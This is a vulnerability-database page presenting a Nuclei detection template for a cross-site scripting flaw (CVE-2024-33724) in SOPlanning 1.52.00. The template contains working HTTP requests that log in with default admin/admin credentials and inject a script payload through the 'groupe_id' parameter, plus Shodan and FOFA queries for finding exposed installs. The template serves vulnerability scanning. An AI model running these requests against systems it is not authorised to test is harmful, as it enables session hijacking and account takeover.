Lucene search
K

SOPlanning 1.52.00 Cross Site Scripting

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 29 Views

SOPlanning v1.52.00 XSS attack via 'groupe_id' parameter can hijack admin or user accounts, session, & platform takeover

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-33722
22 Apr 202419:51
githubexploit
ATTACKERKB
CVE-2024-33724
8 May 202600:00
attackerkb
Circl
CVE-2024-33724
9 May 202410:19
circl
CNNVD
SOPlanning 跨站脚本漏洞
8 May 202600:00
cnnvd
CVE
CVE-2024-33724
8 May 202600:00
cve
Cvelist
CVE-2024-33724
8 May 202600:00
cvelist
EUVD
EUVD-2024-31434
8 May 202606:32
euvd
NVD
CVE-2024-33724
8 May 202606:16
nvd
Positive Technologies
PT-2024-25458
6 May 202400:00
ptsecurity
RedhatCVE
CVE-2024-33724
9 May 202602:21
redhatcve
Rows per page
id: CVE-2024-33724

info:
  name: SOPlanning 1.52.00 Cross Site Scripting
  author: s4e-io
  severity: medium
  description: |
    SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
  impact: |
    Authenticated attackers can inject malicious scripts via the groupe_id parameter, potentially hijacking admin or user sessions.
  remediation: |
    Update SOPlanning to a version that patches the XSS vulnerability.
  reference:
    - https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
    - https://github.com/fuzzlove/soplanning-1.52-exploits
  metadata:
    verified: true
    max-request: 2
    vendor: soplanning
    product: soplanning
    shodan-query:
      - html:"soplanning"
      - http.html:"soplanning"
    fofa-query: body="soplanning"
  tags: packetstorm,cve,cve2024,authenticated,soplanning,xss,vuln

http:
  - raw:
      - |
        POST /process/login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        login={{username}}&password={{password}}

      - |
        GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    attack: pitchfork

    payloads:
      username:
        - admin
      password:
        - admin

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - "status_code_2 == 200"
          - 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")'
        condition: and
# digest: 4b0a00483046022100d53ef1786b72cdae0133ba5343e9f878d6daaf91e75820a1a007f7daca72047f022100f0398464c19b4564c5557f2cca96ca45079a5ffa52b8201d207a1cefbceb8ba4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.15.4
EPSS0.00551
SSVC
29